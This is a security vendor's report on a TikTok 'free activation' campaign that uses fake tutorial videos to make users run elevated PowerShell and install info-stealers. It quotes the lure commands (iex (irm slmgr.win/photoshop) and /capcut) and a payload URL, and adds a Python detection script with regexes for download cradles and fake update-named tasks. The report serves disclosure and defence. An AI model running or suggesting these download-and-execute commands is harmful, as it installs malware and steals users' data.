
Trend 'free software activation' on TikTok – a gateway for malware to enter your device


TikTok is known as a social media platform for sharing short videos, allowing users to create, edit, and share videos ranging from a few seconds to a few minutes, often with music, effects, and creative filters. As of 2025, the platform has attracted over 1.5 billion monthly active users across 150 countries and supports more than 75 languages.


Due to its continuous popularity, cybercriminal groups are exploiting TikTok's viral nature to post fake "tutorial" videos (often AI-generated or deepfake) that urge viewers to execute a command on their device (e.g., PowerShell) to install fake software (cracks, activations, or "free" apps). When users copy and run that command, it downloads and executes info-stealers or loaders like Vidar, StealC, Latrodectus—a variant of the “ClickFix” or “Click-to-fix” tactic. The concerning issue is that these scam videos often attract hundreds of thousands of views, posing a significant threat to information systems.

In this article, we examine one such campaign that spreads malware through Windows PowerShell by instructing users to "crack" Adobe software, which is widely used and therefore a convenient lure.

How Attackers Execute

As mentioned earlier, attackers continue to rely on the common technique known as “ClickFix” (also called “Click-to-fix”) to initiate their campaigns. First, the attacker distributes TikTok videos instructing users to "update" CapCut or to crack Adobe software, attracting a significant number of viewers.

Both tutorial videos use the same trick: they instruct users to open Windows PowerShell and run it as an Administrator. Besides executing the command quickly, an elevated PowerShell session allows the attacker's script to:

  • Editing the system registry.

  • Manage services, drivers, and the processes of other users.

  • Accessing system directories (C:\Windows\System32, C:\Program Files, …).

  • Installing software, modules, or changing policies (Set-ExecutionPolicy, Install-Module, …).

After opening PowerShell and running it as Administrator, the attacker tricks the user into executing a command:

  • PowerShell: iex (irm slmgr.win/photoshop) - for users who want to crack Adobe software

  • PowerShell: iex (irm slmgr.win/capcut) - for users who want to activate CapCut

When the user runs either command, irm (Invoke-RestMethod) downloads a script from https://slmgr.win/photoshop (or /capcut) and iex (Invoke-Expression) executes it directly in memory, without writing a script file to disk. Scam campaigns on TikTok and YouTube have used this exact method to spread malware.

The next stage then downloads a further payload, associated with AuroStealer, from https://file-epq.pages.dev/updater.exe

After the malware is downloaded, it runs a script that creates a Scheduled Task to launch powershell.exe with a command and code (stored in the $scr variable) each time the user logs in. To disguise itself, the task is given one of several legitimate-looking update names (e.g., MicrosoftEdgeUpdateTaskMachineCore, GoogleUpdateTaskMachineCore).

In summary, this script will execute the PowerShell payload ($scr) each time the user logs on. This is a common technique in malware.
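To give defenders something concrete for the two behaviours described above (the iex/irm download cradle and the update-named scheduled task that launches powershell.exe), here is an added detection example in Python. It is not code from the article or the campaign; it assumes the SIEM has already split Windows event 4698 (task created) and PowerShell event 4104 (script block) records into the fields shown, and it runs over constructed sample events with a placeholder URL.

```python
import re
from dataclasses import dataclass

# Task names the campaign borrows from real updaters (named in the article).
UPDATE_LIKE_NAMES = {"MicrosoftEdgeUpdateTaskMachineCore", "GoogleUpdateTaskMachineCore"}
# Download cradle: an expression evaluator plus a web fetch anywhere in the text.
CRADLE_RE = re.compile(
    r"(?=.*\b(?:iex|invoke-expression)\b)"
    r"(?=.*\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b)",
    re.I | re.S)
HIDDEN_RE = re.compile(r"-(?:enc(?:odedcommand)?|w\s+hidden|windowstyle\s+hidden)\b", re.I)

@dataclass
class Event:
    event_id: int  # 4698 = scheduled task created, 4104 = PowerShell script block
    fields: dict   # assumed already extracted from the event XML by the SIEM

def analyse(event):
    """Return (rule, detail) findings for one event; an empty list means benign."""
    findings = []
    if event.event_id == 4698:
        name = event.fields.get("TaskName", "").lstrip("\\")
        action = event.fields.get("Action", "").lower()
        args = event.fields.get("Arguments", "")
        # A genuine updater task launches the vendor binary, never PowerShell.
        if "powershell" in action or "pwsh" in action:
            if name in UPDATE_LIKE_NAMES:
                findings.append(("task_name_masquerade", name))
            if HIDDEN_RE.search(args):
                findings.append(("hidden_or_encoded_powershell_task", name))
            if CRADLE_RE.search(args):
                findings.append(("download_cradle_in_task", name))
    elif event.event_id == 4104:
        script = event.fields.get("ScriptBlockText", "")
        if CRADLE_RE.search(script):
            findings.append(("download_cradle_scriptblock", script.strip()))
    return findings

def triage(events):
    return [(e.event_id, analyse(e)) for e in events if analyse(e)]
# Constructed sample events (not real telemetry); the URL is a placeholder.
SAMPLE_EVENTS = [
    Event(4104, {"ScriptBlockText": "iex (irm http://example.invalid/photoshop)"}),
    Event(4698, {"TaskName": "\\MicrosoftEdgeUpdateTaskMachineCore",
                 "Action": "powershell.exe", "Arguments": "-w hidden -c $scr"}),
    Event(4698, {"TaskName": "\\MicrosoftEdgeUpdateTaskMachineCore",  # the real one
                 "Action": r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe",
                 "Arguments": "/c"}),
    Event(4104, {"ScriptBlockText": "Get-Process | Sort-Object CPU -Descending"}),
]
```

The third sample shows why the task name alone is not a signal: the genuine Edge updater task uses the same name but launches the vendor binary, so it produces no finding.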

Finally, another malicious payload will be executed with the name "source.exe".

A notable feature of this payload is that it will execute code in memory (in-memory execution), which helps avoid writing files to disk and can evade some file-based scanning tools. Additionally, it can run any payload: from stealers, loaders, RATs, to data theft, installing backdoors, or lateral movement.

Conclusion

This campaign shows that cybercriminal groups are effectively using short-video platforms like TikTok and YouTube to deploy in-memory malware that self-compiles through PowerShell. The attackers exploit TikTok's viral nature to trick users into running commands and scripts themselves (social engineering).

It is effective because it combines strong social engineering with sophisticated techniques (persistence plus in-memory execution), which significantly reduces the chance of early detection if defenses rely solely on traditional signature scanning. Countering it requires coordinating technical prevention (EDR, GPO, AppLocker), monitoring (logging plus SIEM), and the human factor (training, awareness).

Recommendations

  1. For Users
  • Do not trust "free tips" or "software hacks."

  • Do not run commands requested from videos or external links (especially with admin rights).

  • Keep software updated: The operating system, security software, browsers, and the applications you use should all be kept up to date to minimize the risk of exploitation by new malware.

  2. Recommendations for Organizations and IT Administrators
  • Implement user education and training: Organizations should have a "phishing awareness" program (phishing, malvertising, social engineering) that includes campaigns like this - using social media videos to lure users into running malware.

  • Restrict the ability to run untrusted code in PowerShell: Use Group Policy to block or control downloading and running scripts from the internet, especially with administrative rights.

  • Use EDR/NGAV solutions capable of detecting "self-compiling" behavior or shellcode injection into memory: the referenced analysis notes the use of csc.exe in stage 2 to compile code and inject shellcode.

  • Software download policy: Allow users to download software only from internal sources or approved software repositories, not from social media links or unknown domains.

IOC

  1. TikTok links

    • hxxps://vm[.]tiktok[.]com/ZGdaCkbEF/

    • hxxps://vm[.]tiktok[.]com/ZGdaC7EQY/

    • hxxps://vm[.]tiktok[.]com/ZGdaX8jVq/

  2. Domain

  3. File hashes

    • 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23

    • db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011

    • 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8

Reference

  1. TikTok Videos Weaponized to Deliver Self-Compiling PowerShell Malware

  2. TikTok Videos Promoting Malware Installation - SANS ISC

FPT IS Security